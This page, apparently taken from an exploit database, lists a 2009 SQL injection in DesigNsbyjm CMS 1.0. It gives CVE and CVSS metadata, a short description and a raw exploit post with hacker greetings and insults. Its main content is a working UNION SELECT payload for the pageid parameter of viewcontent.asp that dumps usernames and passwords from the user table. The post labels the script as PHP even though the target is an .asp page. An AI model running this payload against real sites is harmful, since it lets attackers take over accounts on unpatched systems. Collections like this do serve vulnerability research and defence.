header-logo
Suggest Exploit
vendor:
Designsbyjm Cms
by:
Red-D3v1L
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Designsbyjm Cms
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: a:designsbyjm:designsbyjm_cms:1.0
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection Vulnerability

DesigNsbyjm Cms version 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is due to the lack of proper sanitization of user-supplied input in the 'pageid' parameter of the 'viewcontent.asp' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

===========================================================================
===
[»] ~ Note : Hacker R0x Lamerz Sux !
===========================================================================
===
[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
Vulnerability
===========================================================================
===
[»] my home: [ Hackteach.org ]
[»] Script: [ DesigNsbyjm Cms 1.0 ]
[»] Language: [ PHP ]
[»] Home: [ http://designsbyjm.net/ ]
[»] Founder: [ Red-D3v1L < No Email :d < ]
[»] Gr44tz to: [ Hackteach Team - H1s0k4 - SkuLL-HaCkEr
- sec-r1z.com - 0d4y.com ]
[»] Fuck to : [ Gaza 5acker << Big Big Big Lamerz ]
########################################################################

===[ Exploit SQL ]=== 

[»] [Path]/viewcontent.asp?pageid=[SQL]

http://server/viewcontent.asp?pageid=-9+union+select+1,2,3,4,
password,6,username,8,9,10,11,12,13+from+user


Author: Red-D3v1L